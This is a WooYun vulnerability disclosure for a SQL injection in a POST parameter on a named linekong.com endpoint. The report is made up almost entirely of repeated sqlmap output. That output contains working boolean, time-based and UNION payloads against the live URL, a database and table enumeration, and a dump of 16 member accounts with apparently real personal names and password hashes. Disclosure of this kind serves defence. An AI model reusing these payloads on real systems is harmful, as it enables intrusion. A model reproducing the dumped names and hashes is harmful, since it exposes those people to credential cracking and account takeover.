当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119668

漏洞标题:蓝港某分站SQL注入(post)

相关厂商:linekong.com

漏洞作者: 路人甲

提交时间:2015-06-11 11:23

修复时间:2015-07-30 09:54

公开时间:2015-07-30 09:54

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-11: 细节已通知厂商并且等待厂商处理中
2015-06-15: 厂商已经确认,细节仅向厂商公开
2015-06-25: 细节向核心白帽子及相关领域专家公开
2015-07-05: 细节向普通白帽子公开
2015-07-15: 细节向实习白帽子公开
2015-07-30: 细节向公众公开

简要描述:

RT

详细说明:

http://ms.linekong.com/activity/clan3/_do_getPlayerList.ajax.php
post参数ghId=1&page=1


2.JPG


sqlmap identified the following injection points with a total of 59 HTTP(s) requests:
---
Parameter: ghId (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ghId=1 AND 2207=2207&page=1
Vector: AND [INFERENCE]
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: ghId=1 AND (SELECT * FROM (SELECT(SLEEP(5)))RqfN)&page=1
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: ghId=1 UNION ALL SELECT NULL,NULL,CONCAT(0x717a717671,0x6e79465266636b4b4753,0x716b627871)-- &page=1
Vector: UNION ALL SELECT NULL,NULL,[QUERY]--
---
web application technology: Apache
back-end DBMS: MySQL 5.0.12
available databases [2]:
[*] information_schema
[*] ms_web
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ghId (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ghId=1 AND 2207=2207&page=1
Vector: AND [INFERENCE]
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: ghId=1 AND (SELECT * FROM (SELECT(SLEEP(5)))RqfN)&page=1
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: ghId=1 UNION ALL SELECT NULL,NULL,CONCAT(0x717a717671,0x6e79465266636b4b4753,0x716b627871)-- &page=1
Vector: UNION ALL SELECT NULL,NULL,[QUERY]--
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: ms_web
[57 tables]
+---------------------------------------+
| ms_activity_17173 |
| ms_activity_aprilpromotion_gift |
| ms_activity_aprilpromotion_gift_count |
| ms_activity_aprilpromotion_register |
| ms_activity_clan2_gh |
| ms_activity_clan2_join_log |
| ms_activity_clan3_gh |
| ms_activity_clan3_join_log |
| ms_activity_clan3_survey |
| ms_activity_clan_gh |
| ms_activity_clan_join_log |
| ms_activity_gh_member |
| ms_activity_jh_lottery |
| ms_activity_jh_survey |
| ms_activity_laborday |
| ms_activity_name2_log |
| ms_activity_name3_log |
| ms_activity_name_log |
| ms_activity_signin_log |
| ms_activity_spread |
| ms_activity_spread_log |
| ms_activity_surveyjh_code |
| ms_activity_surveyjh_log |
| ms_activity_surveyjh_option |
| ms_activity_surveyjh_votes |
| ms_activity_voting_log |
| ms_address |
| ms_article |
| ms_article_inserl |
| ms_build |
| ms_channel |
| ms_columns |
| ms_comment |
| ms_download |
| ms_editors_inserl |
| ms_flash |
| ms_grading |
| ms_group |
| ms_image |
| ms_image_inserl |
| ms_lottery_YYexchange |
| ms_lottery_exchange |
| ms_member |
| ms_pass_card_list |
| ms_pass_card_list_log |
| ms_passportstat |
| ms_sort |
| ms_template |
| ms_url |
| ms_url_inserl |
| ms_vote |
| ms_vote_inserl |
| ms_vote_option |
| ms_wj_article |
| ms_wj_article_inserl |
| ms_wj_image |
| ms_wj_image_inserl |
+---------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ghId (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ghId=1 AND 2207=2207&page=1
Vector: AND [INFERENCE]
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: ghId=1 AND (SELECT * FROM (SELECT(SLEEP(5)))RqfN)&page=1
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: ghId=1 UNION ALL SELECT NULL,NULL,CONCAT(0x717a717671,0x6e79465266636b4b4753,0x716b627871)-- &page=1
Vector: UNION ALL SELECT NULL,NULL,[QUERY]--
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: ms_web
Table: ms_member
[26 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| address_id | int(11) |
| article_id | int(11) |
| group_id | int(11) |
| id | int(11) |
| image_id | int(11) |
| nickname | varchar(64) |
| uadd_time | datetime |
| url_id | int(11) |
| user_age | date |
| user_Dreply | int(11) |
| user_Dtopic | int(11) |
| user_email | varchar(32) |
| user_grading | varchar(64) |
| user_jointime | datetime |
| user_like | varchar(255) |
| user_movephone | varchar(32) |
| user_msn | varchar(128) |
| user_name | varchar(32) |
| user_passwd | varchar(32) |
| user_perfect | int(11) |
| user_qq | int(11) |
| user_sex | int(2) |
| user_state | int(2) |
| user_Treply | int(11) |
| user_Ttopic | int(11) |
| vote_id | int(11) |
+----------------+--------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ghId (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ghId=1 AND 2207=2207&page=1
Vector: AND [INFERENCE]
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: ghId=1 AND (SELECT * FROM (SELECT(SLEEP(5)))RqfN)&page=1
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: ghId=1 UNION ALL SELECT NULL,NULL,CONCAT(0x717a717671,0x6e79465266636b4b4753,0x716b627871)-- &page=1
Vector: UNION ALL SELECT NULL,NULL,[QUERY]--
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: ms_web
Table: ms_member
[16 entries]
+------------+-----------+----------------------------------+
| nickname | user_name | user_passwd |
+------------+-----------+----------------------------------+
| doyo | doyo | 862f3760ca3293437b53cac01b0ffe29 |
| sc | 邵辰 | d54185b71f614c30a396ac4bc44d3269 |
| shixi | 实习生 | 003be2507cfad94f1efb32fe3fd0d0ec |
| liuzg | 刘志刚 | 30fed3a8f7747d5b55707b5ebfe4dc77 |
| tech | 运维值班工程师 | de61d9913528e5cc7c0668ad72f53730 |
| lz | 李治 | cd9dac6dbb33988a3214e7ba85d272fc |
| hanwangnan | 韩旺楠 | bd95ee66e3ac8410d69a1d23e6e740ef |
| genganna | 耿安娜 | ad0804967b44d8185764c44e983b3e2d |
| xietang | 谢唐 | 4297f44b13955235245b2497399d7a93 |
| gc | 耿超 | a3973867cdfb643f4b10526c25875928 |
| flz | 付立忠 | 4297f44b13955235245b2497399d7a93 |
| mjd | 马俊东 | 1d62113b2b7ca6f834dd623320b988d3 |
| zc | 张晨 | 92a870e23eaac7b3c576e91b807f2a60 |
| yangzhu | 杨祝 | b5feae60bfe9b16d31639ac64a293b6c |
| lzf | 刘震方 | 69f8d4a98ed0af08960d20dd954f9e45 |
| hmq | 黄孟琪 | 471c75ee6643a10934502bdafee198fb |
+------------+-----------+----------------------------------+

漏洞证明:

sqlmap identified the following injection points with a total of 59 HTTP(s) requests:
---
Parameter: ghId (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ghId=1 AND 2207=2207&page=1
Vector: AND [INFERENCE]
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: ghId=1 AND (SELECT * FROM (SELECT(SLEEP(5)))RqfN)&page=1
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: ghId=1 UNION ALL SELECT NULL,NULL,CONCAT(0x717a717671,0x6e79465266636b4b4753,0x716b627871)-- &page=1
Vector: UNION ALL SELECT NULL,NULL,[QUERY]--
---
web application technology: Apache
back-end DBMS: MySQL 5.0.12
available databases [2]:
[*] information_schema
[*] ms_web
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ghId (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ghId=1 AND 2207=2207&page=1
Vector: AND [INFERENCE]
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: ghId=1 AND (SELECT * FROM (SELECT(SLEEP(5)))RqfN)&page=1
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: ghId=1 UNION ALL SELECT NULL,NULL,CONCAT(0x717a717671,0x6e79465266636b4b4753,0x716b627871)-- &page=1
Vector: UNION ALL SELECT NULL,NULL,[QUERY]--
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: ms_web
[57 tables]
+---------------------------------------+
| ms_activity_17173 |
| ms_activity_aprilpromotion_gift |
| ms_activity_aprilpromotion_gift_count |
| ms_activity_aprilpromotion_register |
| ms_activity_clan2_gh |
| ms_activity_clan2_join_log |
| ms_activity_clan3_gh |
| ms_activity_clan3_join_log |
| ms_activity_clan3_survey |
| ms_activity_clan_gh |
| ms_activity_clan_join_log |
| ms_activity_gh_member |
| ms_activity_jh_lottery |
| ms_activity_jh_survey |
| ms_activity_laborday |
| ms_activity_name2_log |
| ms_activity_name3_log |
| ms_activity_name_log |
| ms_activity_signin_log |
| ms_activity_spread |
| ms_activity_spread_log |
| ms_activity_surveyjh_code |
| ms_activity_surveyjh_log |
| ms_activity_surveyjh_option |
| ms_activity_surveyjh_votes |
| ms_activity_voting_log |
| ms_address |
| ms_article |
| ms_article_inserl |
| ms_build |
| ms_channel |
| ms_columns |
| ms_comment |
| ms_download |
| ms_editors_inserl |
| ms_flash |
| ms_grading |
| ms_group |
| ms_image |
| ms_image_inserl |
| ms_lottery_YYexchange |
| ms_lottery_exchange |
| ms_member |
| ms_pass_card_list |
| ms_pass_card_list_log |
| ms_passportstat |
| ms_sort |
| ms_template |
| ms_url |
| ms_url_inserl |
| ms_vote |
| ms_vote_inserl |
| ms_vote_option |
| ms_wj_article |
| ms_wj_article_inserl |
| ms_wj_image |
| ms_wj_image_inserl |
+---------------------------------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ghId (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ghId=1 AND 2207=2207&page=1
Vector: AND [INFERENCE]
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: ghId=1 AND (SELECT * FROM (SELECT(SLEEP(5)))RqfN)&page=1
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: ghId=1 UNION ALL SELECT NULL,NULL,CONCAT(0x717a717671,0x6e79465266636b4b4753,0x716b627871)-- &page=1
Vector: UNION ALL SELECT NULL,NULL,[QUERY]--
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: ms_web
Table: ms_member
[26 columns]
+----------------+--------------+
| Column | Type |
+----------------+--------------+
| address_id | int(11) |
| article_id | int(11) |
| group_id | int(11) |
| id | int(11) |
| image_id | int(11) |
| nickname | varchar(64) |
| uadd_time | datetime |
| url_id | int(11) |
| user_age | date |
| user_Dreply | int(11) |
| user_Dtopic | int(11) |
| user_email | varchar(32) |
| user_grading | varchar(64) |
| user_jointime | datetime |
| user_like | varchar(255) |
| user_movephone | varchar(32) |
| user_msn | varchar(128) |
| user_name | varchar(32) |
| user_passwd | varchar(32) |
| user_perfect | int(11) |
| user_qq | int(11) |
| user_sex | int(2) |
| user_state | int(2) |
| user_Treply | int(11) |
| user_Ttopic | int(11) |
| vote_id | int(11) |
+----------------+--------------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: ghId (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: ghId=1 AND 2207=2207&page=1
Vector: AND [INFERENCE]
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: ghId=1 AND (SELECT * FROM (SELECT(SLEEP(5)))RqfN)&page=1
Vector: AND (SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: ghId=1 UNION ALL SELECT NULL,NULL,CONCAT(0x717a717671,0x6e79465266636b4b4753,0x716b627871)-- &page=1
Vector: UNION ALL SELECT NULL,NULL,[QUERY]--
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
Database: ms_web
Table: ms_member
[16 entries]
+------------+-----------+----------------------------------+
| nickname | user_name | user_passwd |
+------------+-----------+----------------------------------+
| doyo | doyo | 862f3760ca3293437b53cac01b0ffe29 |
| sc | 邵辰 | d54185b71f614c30a396ac4bc44d3269 |
| shixi | 实习生 | 003be2507cfad94f1efb32fe3fd0d0ec |
| liuzg | 刘志刚 | 30fed3a8f7747d5b55707b5ebfe4dc77 |
| tech | 运维值班工程师 | de61d9913528e5cc7c0668ad72f53730 |
| lz | 李治 | cd9dac6dbb33988a3214e7ba85d272fc |
| hanwangnan | 韩旺楠 | bd95ee66e3ac8410d69a1d23e6e740ef |
| genganna | 耿安娜 | ad0804967b44d8185764c44e983b3e2d |
| xietang | 谢唐 | 4297f44b13955235245b2497399d7a93 |
| gc | 耿超 | a3973867cdfb643f4b10526c25875928 |
| flz | 付立忠 | 4297f44b13955235245b2497399d7a93 |
| mjd | 马俊东 | 1d62113b2b7ca6f834dd623320b988d3 |
| zc | 张晨 | 92a870e23eaac7b3c576e91b807f2a60 |
| yangzhu | 杨祝 | b5feae60bfe9b16d31639ac64a293b6c |
| lzf | 刘震方 | 69f8d4a98ed0af08960d20dd954f9e45 |
| hmq | 黄孟琪 | 471c75ee6643a10934502bdafee198fb |
+------------+-----------+----------------------------------+

修复方案:

参数过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-06-15 09:52

厂商回复:

感谢指出的问题,已将问题转交给开发人员处理

最新状态:

暂无


漏洞评价:

评论